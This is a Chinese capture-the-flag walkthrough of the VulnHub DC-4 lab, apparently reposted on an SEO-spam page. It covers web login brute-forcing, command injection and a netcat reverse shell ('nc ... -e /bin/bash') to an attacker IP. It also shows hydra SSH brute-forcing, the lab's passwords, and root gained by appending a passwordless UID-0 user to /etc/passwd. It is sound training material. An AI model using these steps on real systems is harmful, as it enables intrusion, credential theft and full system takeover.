当前位置: 首页 > wzjs >正文

企业网站建设方案文档seo如何提高排名

企业网站建设方案文档,seo如何提高排名,做产地证新网站,有什么网站是专门做电商详情页下载地址:https://www.vulnhub.com/entry/dc-4,313/ 扫描IP地址 arp-sacn -l扫描端口,开启了80和22端口 nmap -p- 192.168.112.140访问80端口 扫描目录,并没有发现敏感目录 尝试爆破 爆破成功,用户名admin 密码happy 登录成功 …

下载地址:https://www.vulnhub.com/entry/dc-4,313/

扫描IP地址

arp-sacn -l

扫描端口,开启了80和22端口

nmap -p- 192.168.112.140

访问80端口

扫描目录,并没有发现敏感目录

尝试爆破

爆破成功,用户名admin 密码happy

登录成功

里面是已经执行的三个命令,

ls -l

du -h

df -h

既然可以执行命令,那就可以尝试抓包来修改命令

成功执行whoami

尝试写一句话木马进去,但是我们的php代码被过滤了

换一种方式,尝试反弹shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反弹

接下来就是提权

先看一下版本信息

uname -a

并没有可以利用的脚本

之前nmap扫出有22端口,那可以看一下/home目录下的用户

在jim目录下面找到了一些文件,

jim目录下面有一个文件夹和两个文件,mbox没有权限,test.sh不知道写的啥

只有backups目录下面有一个旧密码备份,这里面应该就有jim的ssh密码

使用hydra爆破一下,将密码字典复制到kali,新建文本文件ps.txt作为hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密码为 jibril04

使用ssh成功登录到jim用户

jim目录权限可以查看mbox文件

里面提示我们在/var/emi里面有一封邮件

邮件内容是我们的另一个用户charles发给jim的,里面有他的密码^xHhA&hvim0y

切换到charles用户,查看一下sudo授权

发现可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提权,找到flag

http://www.dtcms.com/wzjs/468879.html

相关文章:

  • 用墨刀做网站后台原型四川企业seo
  • 马来西亚网站后缀东莞seo排名收费
  • 网站免费下载app河南网站排名
  • 经营性网站怎样备案营业推广方式
  • 宁波做网站哪里专业麒麟seo外推软件
  • 微信对接网站可以做301跳转吗百度网站的网址是什么
  • 恩施网站建设seo教学
  • wordpress上传插件青岛网站seo分析
  • 普通人开网店赚钱吗泰安seo推广
  • dedecms 英文网站如何让百度收录自己的网站信息
  • 交互设计和ui设计的区别seo网站推广优化就找微源优化
  • 园区建设网站的方案中国推广网站
  • 资兴做网站公司品牌宣传推广文案
  • 巩义网站推广怎么做app拉新佣金排行榜
  • 网页设计 网站建设 哪个好申京效率值联盟第一
  • 企业建设项目哪个网站可以查手机百度网盘登录入口
  • 如何建设政府网站评估体系事件营销
  • JAVA网站301重定向怎么做成都seo顾问
  • 微信网页版官网登录怎样优化网络
  • 外贸网站建设步骤网站怎么制作免费的
  • 131美女做爰网站企业seo职位
  • 做公司网站客户群体怎么找优化推荐
  • 鞍山一般做一个网站需要多少钱成都网站搜索排名优化公司
  • 有什么软件做短视频网站好灰色词seo推广
  • 网站为什么做重定向淘宝排名查询工具
  • 西安网站建设熊掌号鄂州网站seo
  • 淘宝的网站建设费用推广文章的步骤
  • wordpress页面和文章的区别小红书怎么做关键词排名优化
  • php网站开发中如何引流获客app下载
  • 大连建站程序十大最免费软件排行榜